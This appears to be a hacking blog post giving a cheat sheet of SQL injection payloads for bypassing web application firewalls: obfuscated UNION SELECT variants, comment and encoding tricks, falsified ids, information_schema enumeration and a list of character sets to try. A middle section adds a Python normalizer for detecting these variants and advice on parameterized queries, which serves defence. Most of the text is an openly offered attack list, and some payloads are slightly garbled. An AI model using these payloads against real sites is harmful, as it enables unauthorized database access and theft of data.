This is for readers who already know SQL injection. Sometimes a request returns a 403 Forbidden or Not Acceptable error; this is because of the WAF (web application firewall). You can bypass this by using the following queries. If you don't know SQL injection, learn that first.
Order By Not Working?
You can simply bypass it by using GROUP BY instead of ORDER BY.
Union Select Bypassing:
union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
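Seen from the defending side, most of the variants listed above collapse to the same token stream once the input is decoded and MySQL's comment rules are applied. The following is an added example, not part of the original post: a small normalizer that a detection rule can run before matching. The names normalize, is_union_select and NAIVE are made up for this sketch, and the sample strings are taken or shortened from the list above except where marked as constructed.

```python
import re
from urllib.parse import unquote_plus

NAIVE = re.compile(r"union\s+select", re.I)  # typical raw-string signature, for contrast
UNION_SELECT = re.compile(r"\bunion (?:all |distinct |distinctrow )?select\b")

def normalize(value: str) -> str:
    """Reduce a raw parameter value to roughly the tokens MySQL would see."""
    # Decode until stable so double encoding (%2520 -> %20 -> space) is unwrapped.
    for _ in range(5):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    # MySQL can execute the body of /*! ... */ and /*!50000 ... */ comments,
    # so keep the body (conservative: the version number is ignored).
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Ordinary /* ... */ comments behave as whitespace.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # '#' and '-- ' comments run to end of line; a newline resumes the statement.
    value = re.sub(r"(?:#|--\s)[^\n]*", " ", value)
    # Parentheses and whitespace runs separate tokens the same way a space does.
    value = re.sub(r"[()\s]+", " ", value)
    return value.lower().strip()

def is_union_select(value: str) -> bool:
    """True when the normalized value contains a UNION ... SELECT sequence."""
    return bool(UNION_SELECT.search(normalize(value)))

SAMPLES = [
    "union(select(0),version(),(0))",
    "/*!50000union*/+/*!50000select*/",
    "+union+distinctROW+select+",
    "union/**/select/**/1,2,3",
    "union%23aa%0Aselect",
    "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/",
    "union%2520select",  # constructed double-encoded case
]
BENIGN = ["student union selection committee", "42", "O'Brien #12"]  # constructed

if __name__ == "__main__":
    print("naive  normalized  input")
    for s in SAMPLES + BENIGN:
        naive = bool(NAIVE.search(unquote_plus(s)))
        print(f"{naive!s:5}  {is_union_select(s)!s:10}  {s}")
```

Use the result to reject the request rather than to strip keywords: a string like UNIunionON+SELselectECT from the list only becomes SQL after a filter deletes the inner keyword. Parameterized queries in the application make all of these variants inert regardless of what the WAF matches.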
After the id number, for example id=1 +/*!and*/+1=0:
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
Falsify the URL:
=-id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select
Order bypassing, do it like this:
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where table_schema=database()
unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)
Used with order:
convert()using ascii)
unhex(hex())
If ascii doesn't work, you could try:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2312
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8
source :
http://hack2play.blogspot.com